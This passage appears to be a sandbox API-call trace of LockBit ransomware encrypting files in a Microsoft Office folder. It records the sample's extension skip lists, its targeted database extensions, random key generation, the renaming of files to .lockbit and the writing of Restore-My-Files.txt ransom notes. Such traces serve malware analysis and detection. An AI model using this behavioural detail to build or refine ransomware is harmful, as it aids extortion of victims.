[0204.046] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15275_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15275_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.046] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.046] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.047] free (_Block=0x1fa2ed8) [0204.047] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15275_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.047] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.047] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.047] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3a2c400, ftCreationTime.dwHighDateTime=0x1bd4f3f, ftLastAccessTime.dwLowDateTime=0xbcb414e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc3a2c400, ftLastWriteTime.dwHighDateTime=0x1bd4f3f, nFileSizeHigh=0x0, nFileSizeLow=0x49, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15276_.GIF", cAlternateFileName="")) returned 1 [0204.047] lstrcmpiW (lpString1=".", lpString2="BD15276_.GIF") returned -1 [0204.047] lstrcmpiW (lpString1="..", lpString2="BD15276_.GIF") returned -1 [0204.047] PathFindExtensionW (pszPath="BD15276_.GIF") returned=".GIF" [0204.047] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.047] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.047] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15276_.GIF") returned 1 [0204.048] lstrcmpiW (lpString1="ntldr", lpString2="BD15276_.GIF") returned 1 [0204.048] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15276_.GIF") returned 1 [0204.048] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15276_.GIF") returned 1 [0204.048] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15276_.GIF") returned -1 [0204.048] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15276_.GIF") returned 1 [0204.048] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15276_.GIF") returned 1 [0204.048] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.048] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15276_.GIF") returned=".GIF" [0204.048] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.048] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.048] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.049] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.049] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.049] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.049] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.049] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.049] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.049] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.049] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15276_.GIF.lockbit") returned 78 [0204.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15276_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15276_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.050] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.050] malloc (_Size=0x40068) returned 0x1ff1e60 [0204.050] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=73) returned 1 [0204.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0204.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0204.050] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0204.053] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15276_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15276_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.053] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.054] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.054] free (_Block=0x1fa2ed8) [0204.054] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15276_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.054] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.054] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.054] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2719700, ftCreationTime.dwHighDateTime=0x1bd4f3f, ftLastAccessTime.dwLowDateTime=0xbcb414e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc2719700, ftLastWriteTime.dwHighDateTime=0x1bd4f3f, nFileSizeHigh=0x0, nFileSizeLow=0x3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15277_.GIF", cAlternateFileName="")) returned 1 [0204.054] lstrcmpiW (lpString1=".", lpString2="BD15277_.GIF") returned -1 [0204.054] lstrcmpiW (lpString1="..", lpString2="BD15277_.GIF") returned -1 [0204.054] PathFindExtensionW (pszPath="BD15277_.GIF") returned=".GIF" [0204.054] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.054] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.054] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.055] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.055] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.055] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.055] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.055] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15277_.GIF") returned 1 [0204.055] lstrcmpiW (lpString1="ntldr", lpString2="BD15277_.GIF") returned 1 [0204.055] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15277_.GIF") returned 1 [0204.055] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15277_.GIF") returned 1 [0204.055] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15277_.GIF") returned -1 [0204.055] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15277_.GIF") returned 1 [0204.055] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15277_.GIF") returned 1 [0204.055] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.055] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF") returned=".GIF" [0204.055] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.055] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.056] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.056] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.056] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF.lockbit") returned 78 [0204.056] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15277_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.057] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.057] malloc (_Size=0x40068) returned 0x1ff1e60 [0204.057] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=60) returned 1 [0204.057] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.057] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0204.057] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0204.058] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0204.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.061] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.061] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.061] free (_Block=0x1fa2ed8) [0204.061] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.061] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.061] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.061] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42390f00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd0a560, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x42390f00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21294_.GIF", cAlternateFileName="")) returned 1 [0204.061] lstrcmpiW (lpString1=".", lpString2="BD21294_.GIF") returned -1 [0204.061] lstrcmpiW (lpString1="..", lpString2="BD21294_.GIF") returned -1 [0204.062] PathFindExtensionW (pszPath="BD21294_.GIF") returned=".GIF" [0204.062] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.062] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.062] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.063] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.063] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21294_.GIF") returned 1 [0204.063] lstrcmpiW (lpString1="ntldr", lpString2="BD21294_.GIF") returned 1 [0204.063] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21294_.GIF") returned 1 [0204.063] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21294_.GIF") returned 1 [0204.063] lstrcmpiW (lpString1="autorun.inf", 